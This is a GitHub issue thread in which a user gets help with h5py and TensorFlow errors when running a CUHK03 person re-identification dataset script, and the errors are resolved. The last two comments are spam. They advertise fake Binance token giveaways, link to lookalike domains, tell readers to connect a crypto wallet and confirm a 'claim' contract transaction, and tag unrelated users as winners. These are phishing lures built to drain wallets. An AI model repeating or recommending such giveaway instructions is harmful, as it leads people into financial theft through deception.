### ISSUE TITLE
Folder not found errors

### ISSUE THREAD

**Issue by miladf2** [Deep-Learning-Person-Re-Identification/Implementaion-1#20]
I get this error when I try to run the ./CUHK03/create_dataset.py code. can you please let me know how to fix it:
```
Traceback (most recent call last):
  File "./CUHK03/create_dataset.py", line 92, in <module>
    create_dataset(args.mat_file_path)
  File "./CUHK03/create_dataset.py", line 33, in create_dataset
    val_index = (f[f['testsets'][0][0]][:].T - 1).tolist()
  File "h5py/_objects.pyx", line 54, in h5py._objects.with_phil.wrapper (/Users/ilan/minonda/conda-bld/h5py_1490025880382/work/h5py/_objects.c:2846)
  File "h5py/_objects.pyx", line 55, in h5py._objects.with_phil.wrapper (/Users/ilan/minonda/conda-bld/h5py_1490025880382/work/h5py/_objects.c:2804)
  File "/Users/mf186053/anaconda/lib/python2.7/site-packages/h5py/_hl/group.py", line 169, in __getitem__
    oid = h5o.open(self.id, self._e(name), lapl=self._lapl)
  File "h5py/_objects.pyx", line 54, in h5py._objects.with_phil.wrapper (/Users/ilan/minonda/conda-bld/h5py_1490025880382/work/h5py/_objects.c:2846)
  File "h5py/_objects.pyx", line 55, in h5py._objects.with_phil.wrapper (/Users/ilan/minonda/conda-bld/h5py_1490025880382/work/h5py/_objects.c:2804)
  File "h5py/h5o.pyx", line 190, in h5py.h5o.open (/Users/ilan/minonda/conda-bld/h5py_1490025880382/work/h5py/h5o.c:3740)
KeyError: "Unable to open object (Object 'testsets' doesn't exist)"
```

**Comment by Ning-Ding** [comment]
Try running the command `python create_dataset.py --mat $abs_path_to_your_cuhk03.mat`
The info shows you gave the script a wrong file path to the `cuhk03.mat`.

**Comment by miladf2** [comment]
it still gives the same error with absolute path to the mat file. Any ideas?

**Comment by Ning-Ding** [comment]
Could be a wrong .mat file of CUHK03? Have you tried a new .mat file?

**Comment by miladf2** [comment]
I think it has to do with the username /ilan/minonda which is not my username. I dont know where that is hardcoded or read in.

**Comment by Ning-Ding** [comment]
Try only using the h5py module to read the .mat file, to find out whether there is a "testsets" key in it.

**Comment by miladf2** [comment]
Thanks i downloaded the dataset again and now the first part of the code works. The main code however gives the following error. Is it because of tensorflow new version?

```
    (dtype.name, repr(mismatch), type(mismatch).__name__))
TypeError: Expected int32, got list containing Tensors of type '_Message' instead. ```

**Comment by Ning-Ding** [comment]
Yes, try again with the TensorFlow 1.1 and Keras 2.0

**Comment by miladf2** [comment]
Thanks upgrading tensorflow fixed it.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @rwen2012, @csrbzhb, @Ewkoll, @XDU-sund, @DavidSongGitHub, @funkybase, @zcwlwen, @qizy09, @harshy250, @chenxiing
